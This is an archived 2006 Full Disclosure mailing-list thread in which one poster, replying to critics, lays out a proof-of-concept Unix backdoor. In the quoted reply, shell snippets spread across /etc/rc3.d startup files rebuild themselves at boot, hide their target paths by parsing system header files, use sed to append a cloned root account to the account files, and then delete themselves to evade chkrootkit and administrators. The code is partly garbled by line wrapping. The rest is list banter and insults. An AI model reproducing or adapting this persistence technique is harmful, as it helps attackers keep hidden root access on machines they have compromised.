Home page logo
/

fulldisclosure logo Full Disclosure mailing list archives

Re: Plague re-visited
From: hijacker () oldum net
Date: Mon, 23 Oct 2006 19:43:22 +0300 (EEST)

cheers man,
i'd do the same;-)



-nik

You always get these "i'm l33t and like to insult people" kind of goons on
unmoderated lists.

They're good for a laugh, but usually I just ignore them or if they are
particularly odious I filter them to trash.  There's still good
information
to be found every now and again on this list.

On 10/23/06, hijacker () oldum net <hijacker () oldum net> wrote:

J. Oquendo,
Sorry for my ever asking for clarification on plague.

Keep the "good" work.


Maybe I will be unsubscribed by the time you read those lines, who
knows?

cheers,
-nik

hijacker () oldum net wrote:
Hello Rik,
and how on earth can you make "root" run that piece of code? Do you
have
to specify it in the README section that it is mandatory to run that
as
root in order the "new" application root will be installing to run as
expected?


If you need someone to spell out how this works and how it maintains
an
account then you should unsubscribe from all security lists and search
google for pokemon, change your hobby, get out of this field. From the
onset nothing specified "remote root access" it stated proof of
concept
"BACKDOOR" if you need the term defined for you, re-read the previous
sentence in its entirety.

Indeed, it is hard to tell what it actually does... unless you open
your
eyes and see sed 's/root/something/g' somewhere.


The purpose of me pondering this was a "notion" that one doesn't
always
need to re-invent the wheel. Using standard commands, its actually
easier
and safer to maintain a backdoor. If someone already rooted a machine,
how
does one maintain that account without setting off bells and whistles.
It's alot easier to whip up little bits and pieces and have it
precompile
into one script, run itself, and delete itself afterwards. There would
be
no trace of any "all inclusive" backdoor programs. A snippet here, a
snippet there all precompiling either on a system startup or shutdown.

Either way, installing from hundreds of source files, can make even
the
best sys admin to not notice that part of the source code of the
BACKDOOR-contagious application!


Really... Most system administrators don't even pay attention to log
files. Most system administrators are so caught up with every work,
putting out fires, configuring and maintaining systems they don't have
time to check a 500gb drive for a backdoor, and when they do, they're
doing what running chkrootkit. Using a method such as the one I
described
makes it much more difficult to detect a backdoor. As for seeing the
word
root and raising a red flag, don't make me laugh, see lines 2 and 4
below... Let's start in /etc/rc3.d...

echo "file=`awk 'NR==59 {gsub(/"/,"");print \$3}'
/usr/include/paths.h`"
 K1firstfile
echo "echo "sed -n '1p' \$file|sed 's/[^:]*:/new_account_name:/' >>
$file"
 >>"  >>  K2nextfile
echo "file2=`awk 'NR==74 {print \$8}' /usr/include/sysexits.h`" >>
K3anotherfile
echo "sed -n '1p' \$file2|sed 's/[^:]*:/new_account_name:/'' >>
$file2"

K4endingfile
echo "rm $file1 $file2" >> K5lastfileremove

Where one file depends on the next and so on and so forth. At the end
of
it all the backdoor files are removed, yet on startup (or shutdown
depending on how its written), files are re-compiled and the account
is
recreated. The problem I see with many administrators and users
nowadays,
are they're not totally clued in... So you see file=`awk 'NR==59
{gsub(/"/,"");print \$3}' /usr/include/paths.h` ... Unless you have
K1firstfile checksummed, most wouldn't give it a second look.

bad PLAGUE! bad intentions! bad people possibly putting that where
root
is
messing.


I hope that comment was sarcasm and not stupidity...


=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
J. Oquendo
echo @infiltrated|sed 's/^/sil/g;s/$/.net/g'
http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x1383A743

"How a man plays the game shows something of his
character - how he loses shows all" - Mr. Luckey

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/



_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/




_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault